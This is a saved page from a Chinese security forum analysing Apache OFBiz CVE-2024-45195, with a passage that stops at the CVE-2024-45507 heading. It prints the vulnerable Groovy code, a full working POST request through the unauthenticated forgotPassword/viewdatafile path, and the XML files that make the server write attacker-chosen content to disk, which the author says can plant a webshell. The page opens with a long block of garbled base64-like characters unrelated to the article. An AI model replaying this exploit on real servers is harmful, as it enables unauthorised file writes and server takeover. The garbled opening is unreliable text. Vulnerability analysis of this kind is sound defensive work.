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
|
|||
|
|
<style>.highlight .k{color:#204a87;font-weight:bold}.highlight .l{color:#000000}.highlight .n{color:#000000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .cp{color:#8f5902;font-style:italic}.highlight .c1{color:#8f5902;font-style:italic}.highlight .kc{color:#204a87;font-weight:bold}.highlight .kd{color:#204a87;font-weight:bold}.highlight .kn{color:#204a87;font-weight:bold}.highlight .kr{color:#204a87;font-weight:bold}.highlight .kt{color:#204a87;font-weight:bold}.highlight .m{color:#0000cf;font-weight:bold}.highlight .s{color:#4e9a06}.highlight .na{color:#c4a000}.highlight .nf{color:#000000}.highlight .nn{color:#000000}.highlight .nt{color:#204a87;font-weight:bold}</style>
|
|||
|
|
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media (max-width:800px){}</style>
|
|||
|
|
<!--[if lte IE 8]>
|
|||
|
|
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
|
|||
|
|
<![endif]-->
|
|||
|
|
<!--[if !IE]> -->
|
|||
|
|
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media screen and (max-width:768px){}@media screen and (max-width:768px){}</style><meta name=referrer content=no-referrer><link rel=icon href="data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAMAAABEpIrGAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAADDUExURUxpcVVVVUNDVT5CTz1BUEBVVT1BUD1BTz5CTz5GT0BDUVVVVT5CTz5BUj1CTz5BT05OYj1CUD5GVUJCUj5CUD5BTz5BT0lJbT5CUEJCVT9DUUBHVT5CUD5CTz9CUD5BTz1BTz5CUEREUz5CUD5BUD5DTz5CUD5BT0BDUT5CTz1CUD5EUUBgYEBDUT5CUT1CTz1BUD5BUD9DUT1CT0REVT5BUENDUT1BUEBGUz1BUD9DT0FBUz1CTz5BTz1CUD1BUD1BT5JdbS4AAABAdFJOUwAJKr76DPbywR1MBuRO5fsNsyEfvdtKB4MbfiTa+FnegYwitbBXfPdYrt0pCEiL9XmsRdgeVhO8KI2KK45a2b/ePQx7AAAAwUlEQVQ4y4XTxw7CQAwE0A2E0BN67733Xv3/X4U0kYgimKxP9vgdfNhVildaBVfmpQGPaPD+7mjAW74g5q8Ewqd4QHy1T+JCm4IdsqswsEUUchhYHxCFhYENkpYw0MCFEZuCJYKuMDB1LzQZsPLehX/BCONEGCiWcWGKghKmlTAwwDA3GbByGArCQA39UBiYLfwX/gD3mdyEgSy6i8nAuIfuLAx00ByFgbaB5hT3VdUDmk8mfc0fa9Y1oKLZKyNo+QEJQV3gLnHrKwAAAABJRU5ErkJggg==" type=image/x-icon><style>.sf-hidden{display:none!important}</style><link rel=canonical href="https://xz.aliyun.com/t/15569?time__1311=Gqjxn7iti%3DiQoGNDQ0KBKGQeQtODuA%3DjWoD"><meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"><style>img[src="data:,"],source[src="data:,"]{display:none!important}</style></head>
|
|||
|
|
<body>
|
|||
|
|
<div class="navbar navbar-default">
|
|||
|
|
<div class=navbar-inner>
|
|||
|
|
<div class=container style=text-align:center;position:relative>
|
|||
|
|
<!--[if lte IE 8]>
|
|||
|
|
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验,请使用IE10及以上版本</span>
|
|||
|
|
<![endif]-->
|
|||
|
|
<div class=brand-box>
|
|||
|
|
<a class=brand href=https://xz.aliyun.com/tab/1></a>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15569&from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
|
|||
|
|
登录</a>
|
|||
|
|
|
|||
|
|
<div class="nav-collapse collapse">
|
|||
|
|
<div class="search d1 text-right">
|
|||
|
|
<form action=/search>
|
|||
|
|
<input type=text placeholder=搜索 name=keyword value>
|
|||
|
|
</form>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div id=Wrapper class=container>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class=row2>
|
|||
|
|
<div class=span10>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box content" width="1200px !important" style=width:1200px>
|
|||
|
|
|
|||
|
|
<div class=box-container>
|
|||
|
|
<div class=main-topic>
|
|||
|
|
<div class="clearfix user-info topic-list">
|
|||
|
|
<p><span class=content-title>浅析Apache Ofbiz CVE-2024-45195 & CVE-2024-45507</span>
|
|||
|
|
</p>
|
|||
|
|
<div class=topic-info>
|
|||
|
|
<span class=info-left>
|
|||
|
|
<a href=https://xz.aliyun.com/u/29956>
|
|||
|
|
<span class="username cell"> co_w****</span></a> <span class=i-seprator> / </span>
|
|||
|
|
<span> 2024-09-09 11:03:00</span><span class=i-seprator> / </span>
|
|||
|
|
|
|||
|
|
<span>发表于湖北 / </span>
|
|||
|
|
|
|||
|
|
<span>浏览数 81</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class=content-node>
|
|||
|
|
|
|||
|
|
<span class="label label-default label-node-first">
|
|||
|
|
<a href=https://xz.aliyun.com/tab/4>社区板块</a></span>
|
|||
|
|
<span class="label label-default">
|
|||
|
|
<a href=https://xz.aliyun.com/node/1>漏洞分析</a></span>
|
|||
|
|
|
|||
|
|
</span>
|
|||
|
|
</span>
|
|||
|
|
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
|
|||
|
|
顶(0)</a>
|
|||
|
|
<a class="vote vote-down" href=javascript:void(0)>
|
|||
|
|
踩(0)</a></span>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<hr>
|
|||
|
|
<div id=topic_content class="topic-content markdown-body">
|
|||
|
|
<h1 id=toc-0>浅析Apache Ofbiz CVE-2024-45195 & CVE-2024-45507</h1>
|
|||
|
|
<p>漏洞通告链接:</p>
|
|||
|
|
<ul>
|
|||
|
|
<li><a href=https://nvd.nist.gov/vuln/detail/CVE-2024-45195 target=_blank>https://nvd.nist.gov/vuln/detail/CVE-2024-45195</a></li>
|
|||
|
|
<li><a href=https://nvd.nist.gov/vuln/detail/CVE-2024-45507 target=_blank>https://nvd.nist.gov/vuln/detail/CVE-2024-45507</a></li>
|
|||
|
|
</ul>
|
|||
|
|
<h2 id=toc-1>CVE-2024-45195</h2>
|
|||
|
|
<p>这个漏洞和之前的CVE-2024-38856原理是一样的,可以在unauth controller后面跟一个视图来覆盖,之前CVE-2024-38856的修复是直接将<code>ProgramExport</code>加了个权限,<code>CVE-2024-45195</code>是重新找了个<code>screen</code>来写文件,具体的<code>screen</code>对应的<code>groovy</code>文件为ViewDataFile.groovy如下:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=kn>import</span> <span class=nn>java.util.*</span>
|
|||
|
|
<span class=kn>import</span> <span class=nn>java.net.*</span>
|
|||
|
|
<span class=kn>import</span> <span class=nn>org.apache.ofbiz.security.*</span>
|
|||
|
|
<span class=kn>import</span> <span class=nn>org.apache.ofbiz.base.util.*</span>
|
|||
|
|
<span class=kn>import</span> <span class=nn>org.apache.ofbiz.datafile.*</span>
|
|||
|
|
|
|||
|
|
<span class=n>uiLabelMap</span> <span class=o>=</span> <span class=n>UtilProperties</span><span class=o>.</span><span class=na>getResourceBundleMap</span><span class=o>(</span><span class=s>"WebtoolsUiLabels"</span><span class=o>,</span> <span class=n>locale</span><span class=o>)</span>
|
|||
|
|
<span class=n>messages</span> <span class=o>=</span> <span class=o>[]</span>
|
|||
|
|
|
|||
|
|
<span class=n>dataFileSave</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DATAFILE_SAVE"</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
<span class=n>entityXmlFileSave</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"ENTITYXML_FILE_SAVE"</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
<span class=n>dataFileLoc</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DATAFILE_LOCATION"</span><span class=o>)</span>
|
|||
|
|
<span class=n>definitionLoc</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DEFINITION_LOCATION"</span><span class=o>)</span>
|
|||
|
|
<span class=n>definitionName</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DEFINITION_NAME"</span><span class=o>)</span>
|
|||
|
|
<span class=n>dataFileIsUrl</span> <span class=o>=</span> <span class=kc>null</span> <span class=o>!=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DATAFILE_IS_URL"</span><span class=o>)</span>
|
|||
|
|
<span class=n>definitionIsUrl</span> <span class=o>=</span> <span class=kc>null</span> <span class=o>!=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DEFINITION_IS_URL"</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
<span class=k>try</span> <span class=o>{</span>
|
|||
|
|
<span class=n>dataFileUrl</span> <span class=o>=</span> <span class=n>dataFileIsUrl</span><span class=o>?</span><span class=k>new</span> <span class=n>URL</span><span class=o>(</span><span class=n>dataFileLoc</span><span class=o>):</span><span class=n>UtilURL</span><span class=o>.</span><span class=na>fromFilename</span><span class=o>(</span><span class=n>dataFileLoc</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=k>catch</span> <span class=o>(</span><span class=n>java</span><span class=o>.</span><span class=na>net</span><span class=o>.</span><span class=na>MalformedURLException</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>getMessage</span><span class=o>())</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
|
|||
|
|
<span class=k>try</span> <span class=o>{</span>
|
|||
|
|
<span class=n>definitionUrl</span> <span class=o>=</span> <span class=n>definitionIsUrl</span><span class=o>?</span><span class=k>new</span> <span class=n>URL</span><span class=o>(</span><span class=n>definitionLoc</span><span class=o>):</span><span class=n>UtilURL</span><span class=o>.</span><span class=na>fromFilename</span><span class=o>(</span><span class=n>definitionLoc</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=k>catch</span> <span class=o>(</span><span class=n>java</span><span class=o>.</span><span class=na>net</span><span class=o>.</span><span class=na>MalformedURLException</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>getMessage</span><span class=o>())</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
|
|||
|
|
<span class=n>definitionNames</span> <span class=o>=</span> <span class=kc>null</span>
|
|||
|
|
<span class=nf>if</span> <span class=o>(</span><span class=n>definitionUrl</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=k>try</span> <span class=o>{</span>
|
|||
|
|
<span class=n>ModelDataFileReader</span> <span class=n>reader</span> <span class=o>=</span> <span class=n>ModelDataFileReader</span><span class=o>.</span><span class=na>getModelDataFileReader</span><span class=o>(</span><span class=n>definitionUrl</span><span class=o>)</span>
|
|||
|
|
<span class=k>if</span> <span class=o>(</span><span class=n>reader</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>definitionNames</span> <span class=o>=</span> <span class=o>((</span><span class=n>Collection</span><span class=o>)</span><span class=n>reader</span><span class=o>.</span><span class=na>getDataFileNames</span><span class=o>()).</span><span class=na>iterator</span><span class=o>()</span>
|
|||
|
|
<span class=n>context</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"definitionNames"</span><span class=o>,</span> <span class=n>definitionNames</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>getMessage</span><span class=o>())</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
|
|||
|
|
<span class=n>dataFile</span> <span class=o>=</span> <span class=kc>null</span>
|
|||
|
|
<span class=nf>if</span> <span class=o>(</span><span class=n>dataFileUrl</span> <span class=o>&&</span> <span class=n>definitionUrl</span> <span class=o>&&</span> <span class=n>definitionNames</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=k>try</span> <span class=o>{</span>
|
|||
|
|
<span class=n>dataFile</span> <span class=o>=</span> <span class=n>DataFile</span><span class=o>.</span><span class=na>readFile</span><span class=o>(</span><span class=n>dataFileUrl</span><span class=o>,</span> <span class=n>definitionUrl</span><span class=o>,</span> <span class=n>definitionName</span><span class=o>)</span>
|
|||
|
|
<span class=n>context</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"dataFile"</span><span class=o>,</span> <span class=n>dataFile</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>toString</span><span class=o>());</span> <span class=n>Debug</span><span class=o>.</span><span class=na>log</span><span class=o>(</span><span class=n>e</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
|
|||
|
|
<span class=k>if</span> <span class=o>(</span><span class=n>dataFile</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>modelDataFile</span> <span class=o>=</span> <span class=n>dataFile</span><span class=o>.</span><span class=na>getModelDataFile</span><span class=o>()</span>
|
|||
|
|
<span class=n>context</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"modelDataFile"</span><span class=o>,</span> <span class=n>modelDataFile</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
|
|||
|
|
<span class=k>if</span> <span class=o>(</span><span class=n>dataFile</span> <span class=o>&&</span> <span class=n>dataFileSave</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=k>try</span> <span class=o>{</span>
|
|||
|
|
<span class=n>dataFile</span><span class=o>.</span><span class=na>writeDataFile</span><span class=o>(</span><span class=n>dataFileSave</span><span class=o>)</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>uiLabelMap</span><span class=o>.</span><span class=na>WebtoolsDataFileSavedTo</span> <span class=o>+</span> <span class=n>dataFileSave</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>getMessage</span><span class=o>())</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
|
|||
|
|
<span class=k>if</span> <span class=o>(</span><span class=n>dataFile</span> <span class=o>&&</span> <span class=n>entityXmlFileSave</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=k>try</span> <span class=o>{</span>
|
|||
|
|
<span class=c1>//dataFile.writeDataFile(entityXmlFileSave)</span>
|
|||
|
|
<span class=n>DataFile2EntityXml</span><span class=o>.</span><span class=na>writeToEntityXml</span><span class=o>(</span><span class=n>entityXmlFileSave</span><span class=o>,</span> <span class=n>dataFile</span><span class=o>)</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>uiLabelMap</span><span class=o>.</span><span class=na>WebtoolsDataEntityFileSavedTo</span> <span class=o>+</span> <span class=n>entityXmlFileSave</span><span class=o>)</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
|
|||
|
|
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>getMessage</span><span class=o>())</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=o>}</span>
|
|||
|
|
<span class=n>context</span><span class=o>.</span><span class=na>messages</span> <span class=o>=</span> <span class=n>messages</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>代码很简单,两次远程url加载文件,然后可随意保存到指定位置写Webshell,复现如下:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=nf>POST</span> <span class=nn>/webtools/control/forgotPassword/viewdatafile</span> <span class=kr>HTTP</span><span class=o>/</span><span class=m>1.1</span>
|
|||
|
|
<span class=na>Host</span><span class=o>:</span><span class=l> </span>
|
|||
|
|
<span class=na>Cookie</span><span class=o>:</span> <span class=l>JSESSIONID=842FA87866E065DFD2FC7B92C84E48B8.jvm1; OFBiz.Visitor=10000</span>
|
|||
|
|
<span class=na>Cache-Control</span><span class=o>:</span> <span class=l>max-age=0</span>
|
|||
|
|
<span class=na>Sec-Ch-Ua</span><span class=o>:</span> <span class=l>"Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"</span>
|
|||
|
|
<span class=na>Sec-Ch-Ua-Mobile</span><span class=o>:</span> <span class=l>?0</span>
|
|||
|
|
<span class=na>Sec-Ch-Ua-Platform</span><span class=o>:</span> <span class=l>"macOS"</span>
|
|||
|
|
<span class=na>Upgrade-Insecure-Requests</span><span class=o>:</span> <span class=l>1</span>
|
|||
|
|
<span class=na>User-Agent</span><span class=o>:</span> <span class=l>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36</span>
|
|||
|
|
<span class=na>Accept</span><span class=o>:</span> <span class=l>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span>
|
|||
|
|
<span class=na>Sec-Fetch-Site</span><span class=o>:</span> <span class=l>none</span>
|
|||
|
|
<span class=na>Sec-Fetch-Mode</span><span class=o>:</span> <span class=l>navigate</span>
|
|||
|
|
<span class=na>Sec-Fetch-User</span><span class=o>:</span> <span class=l>?1</span>
|
|||
|
|
<span class=na>Sec-Fetch-Dest</span><span class=o>:</span> <span class=l>document</span>
|
|||
|
|
<span class=na>Accept-Encoding</span><span class=o>:</span> <span class=l>gzip, deflate, br</span>
|
|||
|
|
<span class=na>Accept-Language</span><span class=o>:</span> <span class=l>zh-CN,zh;q=0.9</span>
|
|||
|
|
<span class=na>Priority</span><span class=o>:</span> <span class=l>u=0, i</span>
|
|||
|
|
<span class=na>Connection</span><span class=o>:</span> <span class=l>keep-alive</span>
|
|||
|
|
<span class=na>Content-Type</span><span class=o>:</span> <span class=l>application/x-www-form-urlencoded</span>
|
|||
|
|
<span class=na>Content-Length</span><span class=o>:</span> <span class=l>187</span>
|
|||
|
|
|
|||
|
|
DATAFILE_LOCATION=http://127.0.0.1:8081/1.xml&DEFINITION_IS_URL=1&DATAFILE_IS_URL=1&DEFINITION_LOCATION=http://127.0.0.1:8081/2.xml&DATAFILE_SAVE=/tmp/2.txt&DEFINITION_NAME=TaxwareOutHead
|
|||
|
|
</pre></div>
|
|||
|
|
<p>2.xml文件内容:</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=cp><?xml version="1.0" encoding="UTF-8"?></span>
|
|||
|
|
<span class=nt><data-files</span> <span class=na>xmlns:xsi=</span><span class=s>"http://www.w3.org/2001/XMLSchema-instance"</span>
|
|||
|
|
<span class=na>xsi:noNamespaceSchemaLocation=</span><span class=s>"https://ofbiz.apache.org/dtds/datafiles.xsd"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><data-file</span> <span class=na>name=</span><span class=s>"TaxwareOutHead"</span> <span class=na>type-code=</span><span class=s>"001"</span> <span class=na>record-length=</span><span class=s>"21"</span> <span class=na>separator-style=</span><span class=s>"fixed-record"</span> <span class=na>start-line=</span><span class=s>"0"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><record</span> <span class=na>name=</span><span class=s>"outHead"</span><span class=nt>></span>
|
|||
|
|
<span class=nt><field</span> <span class=na>name=</span><span class=s>"COMPRESSION_INDICATOR"</span> <span class=na>position=</span><span class=s>"1"</span> <span class=na>length=</span><span class=s>"20"</span> <span class=na>type=</span><span class=s>"String"</span><span class=nt>/></span>
|
|||
|
|
<span class=nt></record></span>
|
|||
|
|
<span class=nt></data-file></span>
|
|||
|
|
<span class=nt></data-files></span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>1.xml文件内容:</p>
|
|||
|
|
<pre><code>123456789012345678901</code></pre>
|
|||
|
|
<p>(这里需要注意下2.xml和1.xml对应的record-length和length)上面将<code>23456789012345678901</code>内容写入到<code>/tmp/2.txt</code>文件中。</p>
|
|||
|
|
<p>在最新版的Ofbiz中(18.12.16)版本引入了视图权限校验,具体issue如下:<a href=https://github.com/apache/ofbiz-framework/commit/ab78769c2d7f22bd2ca8cc77b6be4f71d8bba24f target=_blank>https://github.com/apache/ofbiz-framework/commit/ab78769c2d7f22bd2ca8cc77b6be4f71d8bba24f</a></p>
|
|||
|
|
<p>其实这个修复issus在上个版本,也就是修复CVE-2024-38856的时候提过,不过看样子是官方觉得麻烦,就直接给ProgramExport screen加了权限,包括下面的CVE-2024-45507漏洞,也有一部分利用了这个screen覆盖功能。</p>
|
|||
|
|
<h2 id=toc-2>CVE-2024-45507</h2>
|
|||
